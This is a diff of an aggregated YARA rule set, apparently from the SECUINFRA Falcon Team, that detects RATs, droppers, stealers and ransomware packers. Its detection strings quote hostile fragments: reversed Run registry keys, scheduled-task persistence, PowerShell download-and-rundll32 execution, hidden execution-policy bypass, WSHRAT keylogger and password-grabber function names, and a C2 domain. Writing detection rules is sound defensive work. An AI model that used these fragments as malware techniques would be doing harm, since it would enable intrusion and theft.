+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/lnk.yar#L31-L46"
 		license_url = "N/A"
-		logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe"
-		score = 60
-		quality = 25
+		logic_hash = "3f2a04702b39bce48fc85aa68f39e6062c3b5ee37667eb086222a866a5e438e4"
+		score = 65
+		quality = 70
 		tags = "FILE"
-		version = "0.1"
 
 	strings:
-		$create = "New-ScheduledTaskAction"
-		$execute = "-Execute"
-		$trigger = "New-ScheduledTaskTrigger"
-		$at_param = "-At"
-		$register = "Register-ScheduledTask"
-		$action = "-Action"
-		$path1 = "C:\\ProgramData\\"
-		$path2 = "C:\\Windows\\Temp"
-		$path3 = "AppData\\Local"
+		$header = {4c00 0000 0114 0200 0000}
+		$public = "$env:public" wide
 
 	condition:
-		filesize < 30KB and 1 of ( $path* ) and ( $create and $execute ) or ( $trigger and $at_param ) or ( $register and $action )
+		filesize < 20KB and ( $header at 0 ) and $public
 }
-rule SECUINFRA_SUSP_Reverse_Run_Key : FILE
+rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage
 {
 	meta:
-		description = "Detects a Reversed Run Key"
+		description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT"
 		author = "SECUINFRA Falcon Team"
-		id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd"
-		date = "2022-02-27"
-		modified = "2022-02-27"
+		id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747"
+		date = "2022-12-02"
+		modified = "2022-02-13"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19"
 		license_url = "N/A"
-		logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e"
-		score = 65
+		logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35"
+		score = 75
 		quality = 70
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
+		$wscript = "= WScript["
+		$hex_enc_str1 = "\\x63\\x72\\x65\\x61"
+		$hex_enc_str2 = "\\x73\\x63\\x72\\x69"
+		$hex_enc_str3 = "\\x71\\x75\\x69\\x74"
+		$hex_enc_str4 = "\\x41\\x72\\x67\\x75"
 
 	condition:
-		filesize < 100KB and $run
+		#wscript> 30 and 2 of ( $hex_enc_str* )
 }
 rule SECUINFRA_OBFUS_Powershell_Execution : FILE
 {
@@ -165770,53 +165957,166 @@ rule SECUINFRA_OBFUS_Powershell_Replace_Tilde : FILE
 	condition:
 		filesize < 400KB and $a
 }
-rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage
+rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE
 {
 	meta:
-		description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT"
+		description = "Detecs reversed StartUp Path. Sometimes used as obfuscation"
 		author = "SECUINFRA Falcon Team"
-		id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747"
+		id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13"
+		license_url = "N/A"
+		logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc"
+		score = 75
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$reverse = "\\putratS\\smargorP\\uneM" wide nocase
+
+	condition:
+		filesize < 200KB and $reverse
+}
+rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE
+{
+	meta:
+		description = "Detects the final Payload of WSHART"
+		author = "SECUINFRA Falcon Team"
+		id = "8db5e349-c83e-53c3-a44d-cfe4732fe08d"
 		date = "2022-12-02"
 		modified = "2022-02-13"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/wshrat.yar#L2-L44"
 		license_url = "N/A"
-		logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35"
+		hash = "b7f53ccc492400290016e802e946e526"
+		logic_hash = "12d893f0ca83e805fa570d3f72eb733c8d8b1ae6c0d37bf179ac675d108c7412"
 		score = 75
-		quality = 70
-		tags = ""
+		quality = 68
+		tags = "RAT, JAVASCRIPT, WSHRAT, FILE"
 
 	strings:
-		$wscript = "= WScript["
-		$hex_enc_str1 = "\\x63\\x72\\x65\\x61"
-		$hex_enc_str2 = "\\x73\\x63\\x72\\x69"
-		$hex_enc_str3 = "\\x71\\x75\\x69\\x74"
-		$hex_enc_str4 = "\\x41\\x72\\x67\\x75"
+		$function1 = "runBinder"
+		$function2 = "getBinder"
+		$function3 = "Base64Encode"
+		$function4 = "payloadLuncher"
+		$function5 = "getMailRec"
+		$function6 = "getHbrowser"
+		$function7 = "passgrabber"
+		$function8 = "getRDP"
+		$function9 = "getUVNC"
+		$function10 = "getConfig"
+		$function11 = "getKeyLogger"
+		$function12 = "enumprocess"
+		$function13 = "cmdshell"
+		$function14 = "faceMask"
+		$function15 = "upload"
+		$function16 = "download"
+		$function17 = "sitedownloader"
+		$function18 = "servicestarter"
+		$function19 = "payloadLuncher"
+		$function20 = "keyloggerstarter"
+		$function21 = "reverserdp"
+		$function22 = "reverseproxy"
+		$function23 = "decode_pass"
+		$function24 = "disableSecurity"
+		$function25 = "installsdk"
+		$cmd1 = "osversion = eval(osversion)"
+		$cmd2 = "download(cmd[1],cmd[2])"
+		$cmd3 = "keyloggerstarter(cmd[1]"
+		$cmd4 = "decode_pass(retcmd);"
 
 	condition:
-		#wscript> 30 and 2 of ( $hex_enc_str* )
+		filesize < 2MB and 2 of ( $cmd* ) and 12 of ( $function* )
 }
-rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE
+
+rule SECUINFRA_MAL_Njrat : FILE
 {
 	meta:
-		description = "Detecs reversed StartUp Path. Sometimes used as obfuscation"
+		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c"
+		id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5"
 		date = "2022-02-27"
 		modified = "2022-02-27"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35"
 		license_url = "N/A"
-		logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc"
+		logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5"
 		score = 75
 		quality = 70
 		tags = "FILE"
+		hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126"
+		hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa"
+		hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944"
 
 	strings:
-		$reverse = "\\putratS\\smargorP\\uneM" wide nocase
+		$mutex_1 = "02ddd2742fd5023579c925948979506c" wide
+		$mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide
+		$mutex_3 = "f7d3b79624476341312866012d0bbf19" wide
+		$a1 = "\"|'|'|\"" wide
+		$a2 = "SEE_MASK_NOZONECHECKS" wide
+		$b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$b2 = "netsh firewall" wide
+		$b3 = "[ENTER]\\r\\n" wide
+		$b4 = "Execute ERROR" wide
 
 	condition:
-		filesize < 200KB and $reverse
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and pe.imports ( "avicap32.dll" ) and 1 of ( $mutex_* ) or ( 1 of ( $a* ) and 2 of ( $b* ) )
+}
+rule SECUINFRA_MAL_Nw0Rm : FILE
+{
+	meta:
+		description = "Detect the final RAT dropped by N-W0rm"
+		author = "SECUINFRA Falcon Team"
+		id = "b014ce63-33ec-51df-a529-0c197dac2d7a"
+		date = "2022-03-02"
+		modified = "2022-02-07"
+		reference = "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/n-w0rm.yar#L1-L24"
+		license_url = "N/A"
+		hash = "08587e04a2196aa97a0f939812229d2d"
+		logic_hash = "04078c57c1aa0065fceec7dc92b201bda23de1c5f5a940803a81250bdd685736"
+		score = 75
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$a1 = "N-W0rm" fullword wide
+		$a2 = "N_W0rm" fullword wide
+		$a3 = "|NW|" fullword wide
+		$b1 = "Select * from AntivirusProduct" fullword wide
+		$b2 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File" fullword wide
+		$b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
+		$b4 = "killer" fullword wide
+		$b5 = "nyanmoney02.duckdns.org" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 2 of ( $a* ) and 2 of ( $b* )
+}
+
+rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716
+{
+	meta:
+		description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db"
+		date = "2023-03-07"
+		modified = "2023-03-07"
+		reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20"
+		license_url = "N/A"
+		logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297"
+		score = 50
+		quality = 70
+		tags = "CVE-2023-21716"
+		tlp = "CLEAR"
+
+	strings:
+		$fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/
+
+	condition:
+		uint32be( 0x0 ) == 0x7B5C7274 and !fonttbl_len [ 1 ] > 256 and console.log ( "[!] Inflated fonttable with length: " , !fonttbl_len [ 1 ] )
 }
 rule SECUINFRA_APT_Bitter_Maldoc_Verify : CVE_2018_0798
 {
@@ -165908,330 +166208,98 @@ rule SECUINFRA_APT_Bitter_PDB_Paths : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and any of ( $pdbPath* )
 }
-
-rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716
-{
-	meta:
-		description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db"
-		date = "2023-03-07"
-		modified = "2023-03-07"
-		reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20"
-		license_url = "N/A"
-		logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297"
-		score = 50
-		quality = 45
-		tags = "CVE-2023-21716"
-		tlp = "CLEAR"
-
-	strings:
-		$fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/
-
-	condition:
-		uint32be( 0x0 ) == 0x7B5C7274 and !fonttbl_len [ 1 ] > 256 and console.log ( "[!] Inflated fonttable with length: " , !fonttbl_len [ 1 ] )
-}
-rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE
-{
-	meta:
-		description = "Family was taken from VirusTotal"
-		author = "SECUINFRA Falcon Team"
-		id = "7e2ab9db-142c-5dee-92b7-4a70d747c540"
-		date = "2022-02-18"
-		modified = "2022-02-18"
-		reference = "https://bazaar.abuse.ch/sample/c8a8fea3cbe08cd97e56a0e0dbc59a892f8ab1ff3b5217ca3c9b326eeee6ca66/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/valyria.yar#L1-L23"
-		license_url = "N/A"
-		logic_hash = "94643123a4be26c818d43a77b907edf8651d306463f4df750db67cef790f10eb"
-		score = 75
-		quality = 70
-		tags = "JAVASCRIPT, VBS, VALYRIA, FILE"
-
-	strings:
-		$a1 = "<script language=\"vbscript\">"
-		$a2 = "<script language=\"javascript\">"
-		$b1 = "window.resizeTo(0,0);"
-		$b2 = ".Environment"
-		$b3 = ".item().Name"
-		$b4 = "v4.0.30319"
-		$b5 = "v2.0.50727"
-		$c1 = "Content Writing.docx"
-		$c2 = "eval"
-
-	condition:
-		filesize < 600KB and all of ( $a* ) and 3 of ( $b* ) and 1 of ( $c* )
-}
-rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE
-{
-	meta:
-		description = "Detects the first stage of AgentTesla (JavaScript)"
-		author = "SECUINFRA Falcon Team"
-		id = "0a098f27-8dbc-5749-9a0d-fd0198184c7a"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/agent_tesla.yar#L1-L18"
-		license_url = "N/A"
-		hash = "bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec"
-		logic_hash = "7c21f80a02aa161ffb2edf47aff796f22aff2a563abcb0097cc86371c05e516d"
-		score = 75
-		quality = 45
-		tags = "JAVASCRIPT, AGENTTESLA, OBFUSCATORIO, FILE"
-
-	strings:
-		$mz = "TVq"
-		$a1 = ".jar"
-		$a2 = "bin.base64"
-		$a3 = "appdata"
-		$a4 = "skype.exe"
-
-	condition:
-		filesize < 500KB and $mz and 3 of ( $a* )
-}
-rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE
-{
-	meta:
-		description = "Detects unknown HTA Dropper"
-		author = "SECUINFRA Falcon Team"
-		id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9"
-		date = "2022-10-02"
-		modified = "2022-02-19"
-		reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21"
-		license_url = "N/A"
-		hash = "1749f4127bba3f7204710286b1252e14"
-		logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75"
-		score = 75
-		quality = 43
-		tags = "DROPPER, HTA, FILE"
-
-	strings:
-		$a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >"
-		$a2 = "Function XmlTime(t)"
-		$a3 = "C:\\ProgramData\\"
-		$a4 = "wscript.exe"
-		$a5 = "Array" nocase
-		$b = "chr" nocase
-
-	condition:
-		filesize < 70KB and all of ( $a* ) and #b > 7
-}
-rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE
-{
-	meta:
-		description = "Detects the first stage of WSHRAT as obfuscated JavaScript"
-		author = "SECUINFRA Falcon Team"
-		id = "3bd363dc-3183-595e-931b-668eb17495f5"
-		date = "2022-11-02"
-		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/ad24ae27346d930e75283b10d4b949a4986c18dbd5872a91f073334a08169a14/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/wshrat.yar#L1-L18"
-		license_url = "N/A"
-		hash = "793eff1b2039727e76fdd04300d44fc6"
-		logic_hash = "1390929d06bd1259dbab425fd4e953119f632be460f57756a0c226e9f510d75a"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	strings:
-		$a1 = "'var {0} = WS{1}teObject(\"ado{2}am\");"
-		$b1 = "String[\"prototype\"]"
-		$b2 = "this.replace("
-		$b3 = "Array.prototype"
-
-	condition:
-		filesize < 1500KB and $a1 and #b3 > 3 and #b1 > 2 and $b2
-}
-rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE
+rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory"
 		author = "SECUINFRA Falcon Team"
-		id = "80f84c2f-7af0-55c1-bc06-d605beae3e33"
+		id = "65aad597-c5fe-50c3-8970-19fb502f1602"
 		date = "2022-02-21"
-		modified = "2022-02-21"
-		reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25"
 		license_url = "N/A"
-		logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358"
-		score = 75
-		quality = 70
+		logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe"
+		score = 60
+		quality = 25
 		tags = "FILE"
+		version = "0.1"
 
 	strings:
-		$a1 = "http://3.145.46.6/"
-		$b1 = "Const HIDDEN_WINDOW = 0"
-		$b2 = "GetObject(\"winmgmts:\\\\"
-		$c = "replace("
+		$create = "New-ScheduledTaskAction"
+		$execute = "-Execute"
+		$trigger = "New-ScheduledTaskTrigger"
+		$at_param = "-At"
+		$register = "Register-ScheduledTask"
+		$action = "-Action"
+		$path1 = "C:\\ProgramData\\"
+		$path2 = "C:\\Windows\\Temp"
+		$path3 = "AppData\\Local"
 
 	condition:
-		filesize < 10KB and ( $a1 or ( all of ( $b* ) and #c > 10 ) )
+		filesize < 30KB and 1 of ( $path* ) and ( $create and $execute ) or ( $trigger and $at_param ) or ( $register and $action )
 }
-rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE
+rule SECUINFRA_SUSP_Reverse_Run_Key : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects a Reversed Run Key"
 		author = "SECUINFRA Falcon Team"
-		id = "5296667a-2932-597e-8f49-b7fa755cb387"
+		id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd"
 		date = "2022-02-27"
 		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23"
-		license_url = "N/A"
-		logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb"
-		score = 75
-		quality = 70
-		tags = "VBS, NJRAT, DROPPER, FILE"
-
-	strings:
-		$a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide
-		$a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide
-		$b1 = "CreateObject(\"WScript.Shell\")" wide
-		$b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide
-		$b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide
-		$b4 = "& DGRP & NvWt & DGRP &" wide
-		$b5 = "= ogidoC$" wide
-
-	condition:
-		filesize < 300KB and ( ( 1 of ( $a* ) ) or ( 2 of ( $b* ) ) )
-}
-rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE
-{
-	meta:
-		description = "No description has been set in the source file - SecuInfra"
-		author = "SECUINFRA Falcon Team"
-		id = "a07f80e4-56c3-5b75-be64-648bc1fde964"
-		date = "2022-02-19"
-		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19"
-		license_url = "N/A"
-		logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed"
-		score = 75
-		quality = 20
-		tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE"
-		version = "0.1"
-
-	strings:
-		$a1 = "$$$"
-		$a2 = "microsoft.xmldom"
-		$a3 = "eval"
-		$a4 = "join(\"\")"
-
-	condition:
-		( uint16( 0 ) == 0x7566 or uint16( 0 ) == 0x6176 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x660a ) and filesize < 60KB and all of ( $a* )
-}
-rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD
-{
-	meta:
-		description = "Detect a Download to %temp% and execution with rundll32.exe"
-		author = "SECUINFRA Falcon Team"
-		id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9"
-		date = "2022-09-02"
-		modified = "2022-02-19"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38"
 		license_url = "N/A"
-		logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44"
+		logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e"
 		score = 65
 		quality = 70
-		tags = "POWERSHELL, DOWNLOAD"
+		tags = "FILE"
 
 	strings:
-		$location = "$Env:temp" nocase
-		$download = "downloadfile(" nocase
-		$rundll = "rundll32.exe"
+		$run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
 
 	condition:
-		$location and $download and $rundll
+		filesize < 100KB and $run
 }
 
-rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE
+rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE
 {
 	meta:
-		description = "Detects the packer used by Lockbit Black (Version 3)"
+		description = "Detects Certificate used by Redline Stealer"
 		author = "SECUINFRA Falcon Team"
-		id = "f4c1a12b-eb89-5a46-97a9-f0207ca1bbde"
-		date = "2022-07-04"
-		modified = "2022-07-04"
-		reference = "https://twitter.com/vxunderground/status/1543661557883740161"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Lockbit_Black_Packer.yar#L5-L40"
+		id = "a91d0510-ab4e-5f22-bcce-9a42beff5190"
+		date = "2022-12-02"
+		modified = "2022-02-13"
+		reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16"
 		license_url = "N/A"
-		logic_hash = "cde7f5374b97b2462cfd951994b6bb3ef0962e1be71253e25ca14d53c3d3d615"
+		logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e"
 		score = 75
-		quality = 45
-		tags = "RANSOMWARE, FILE"
-		tlp = "WHITE"
-		hash0 = "80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce"
-		hash1 = "506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51"
-		hash2 = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee"
-
-	strings:
-		$sectionname0 = ".rdata$zzzdbg" ascii
-		$sectionname1 = ".xyz" ascii fullword
-		$check0 = {3d 75 80 91 76 ?? ?? 3d 1b a4 04 00 ?? ?? 3d 9b b4 84 0b}
-		$check1 = {3d 75 ba 0e 64}
-		$asciiCalc = {66 83 f8 41 ?? ?? 66 83 f8 46 ?? ?? 66 83 e8 37}
+		quality = 70
+		tags = "FILE"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 111KB and filesize < 270KB and all of ( $sectionname* ) and any of ( $check* ) and $asciiCalc and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( math.entropy ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) > 7.9 and ( pe.sections [ i ] . name == ".text" or pe.sections [ i ] . name == ".data" or pe.sections [ i ] . name == ".pdata" ) and console.log ( "High Entropy section found:" , pe.sections [ i ] . name ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures [ i ] . serial == "72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11" )
 }
-rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE
+
+rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects Certificate used by Redline Stealer"
 		author = "SECUINFRA Falcon Team"
-		id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84"
-		date = "2022-02-19"
-		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14"
+		id = "70081810-704e-5734-8a78-f97e17989460"
+		date = "2022-02-13"
+		modified = "2022-02-13"
+		reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31"
 		license_url = "N/A"
-		logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428"
+		logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		version = "0.1"
-
-	strings:
-		$name = "PDF-Scan180220225499044" ascii wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and $name
-}
-rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23
-{
-	meta:
-		description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a"
-		date = "2023-03-16"
-		modified = "2023-03-16"
-		reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33"
-		license_url = "N/A"
-		logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b"
-		score = 75
-		quality = 45
-		tags = ""
-		tlp = "CLEAR"
-		hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4"
-		hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8"
